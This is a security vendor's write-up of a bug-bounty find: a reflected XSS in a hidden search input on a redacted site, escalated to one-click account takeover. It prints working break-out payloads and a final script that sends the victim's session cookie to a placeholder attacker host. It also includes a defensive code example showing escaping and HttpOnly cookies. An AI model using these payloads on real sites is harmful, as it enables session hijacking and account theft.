From Simple XSS to One Click Account Takeover
What is Cross-site scripting?
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. Sometimes a small mistake can lead to something huge that puts the entire business environment at risk, and businesses don't know about it (or don't pay enough attention).
This is one of those true stories.
So, I was hunting for web application vulnerabilities in a huge website (let's use redacted.com as that huge company).
Redacted.com has a big asset scope: more than 500 subdomains and internet-connected devices, which can be identified through various techniques (SSL certificates, favicons, dorking in various sites and so on; the UltraRed system does all of this automatically!). So, after gathering the entire scope of the target, I decided to crawl those websites for any user input. For example, redacted.com had an option to search the page, which results in the following link: https://redacted.com/?s=term.
I quickly tested every link gathered for any reflection, basically to see if any client input was reflected on the website.
This can be done automatically with several different tools, which fuzz each parameter without any malicious content (so as not to get blocked by the WAF during early-stage reconnaissance), just to see which characters are being filtered on the website.
For example: if we type Testing" in the search box, with an extra " as a character, it will be sent URL encoded like this: https://redacted.com/?s=Testing". If the " is reflected on the page, that means there's a possible injection on the page.
Sometimes characters like [' > <] can also indicate a possible Cross-site scripting, or even SQL Injection in some cases (maybe that parameter is being sent to the database unsanitized?).
So, now that we finally found our parameter, we can start testing for Cross-site scripting.
First test payload: "><svg/onload=alert(1)> - NO POP UP.
Checking the source code to see where our code is being reflected, we can see that we're inside a hidden input type, which means the value is not rendered on the page. To trigger the XSS automatically we need to craft a payload that escapes the hidden input, or closes the previous script tag and creates a new tag:
- "></scRiPt><sVG/onload=confirm(1)> - POP UP EXECUTED.
Cool, What now?
Well, here comes the big impact: alert is just a proof of concept that client-side JavaScript can be executed. Together with more misconfiguration in the website, we could perform a One Click Account Takeover.
One Click Account Takeover is a crafted link created by an attacker to exploit a function on a website. The link is sent to a target who uses the website; with only one click on the URL, the attacker can take over any account associated with the company in seconds, and ordinary protection methods such as 2FA or MFA would not suffice.
Final payload:
- "</scRiPt><script>var i=new Image(); i.src="http://<ATTACKERURL.COM>/?cookie="+btoa(document.cookie);</script>
- The payload sent the entire session cookie, private information and details about the account, in BASE64, to the attacker.
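To show the defender's side of the two findings above (a search term echoed into a hidden input, and a session cookie readable from document.cookie), here is an added example that is not code from the original post or from UltraRed. The page template, the parameter name s and the cookie name are assumptions for illustration; the sample URL carries the post's first test payload.

```python
# Added example (not from the original post): a tiny model of the redacted.com
# search page, rendered the vulnerable way and the hardened way.
# The template, parameter name "s" and cookie name are assumptions.
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Assumed page layout: the search term is echoed into a hidden input.
TEMPLATE = '<form action="/"><input type="hidden" name="s" value="{term}"></form>'

# Constructed sample: the post's first test payload, URL-encoded in ?s=
SEARCH_URL = "https://redacted.com/?s=%22%3E%3Csvg/onload=alert(1)%3E"


def term_from_url(url: str) -> str:
    """Extract the s= parameter the way the server would (URL-decoded)."""
    return parse_qs(urlsplit(url).query).get("s", [""])[0]


def render_vulnerable(term: str) -> str:
    """Bug: the raw term is concatenated into an attribute value, so a
    leading "> closes the hidden input and anything after it becomes markup."""
    return TEMPLATE.format(term=term)


def render_hardened(term: str) -> str:
    """Fix: attribute-encode the term, so " becomes &quot; and < becomes &lt;.
    The browser then sees one string value, never a new tag."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


class TagCollector(HTMLParser):
    """Records every start tag a browser would build from the rendered page."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def rendered_tags(page: str) -> list:
    """Tag list of a rendering; an injected 'svg' here means the break-out worked."""
    p = TagCollector()
    p.feed(page)
    return p.tags


def session_cookie_header(value: str) -> str:
    """HttpOnly keeps the cookie out of document.cookie, so the post's
    btoa(document.cookie) exfiltration would not carry the session."""
    return f"Set-Cookie: session={value}; Secure; HttpOnly; SameSite=Lax; Path=/"
```

Run rendered_tags() on both renderings of term_from_url(SEARCH_URL): the vulnerable one yields an extra svg tag, the hardened one does not.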
With those cookies an attacker can take over the account of any user who clicks the malicious link. To sum up, Cross-site scripting is one of the most dangerous vulnerabilities on the web, and no wonder it is in the OWASP Top 10.
Attackers with knowledge and the right determination can cause damage whose origin would be hard to trace.
UltraRed knows how to detect those Cross-site scripting variables and helps clients keep their business intact.
ULTRA Eddie.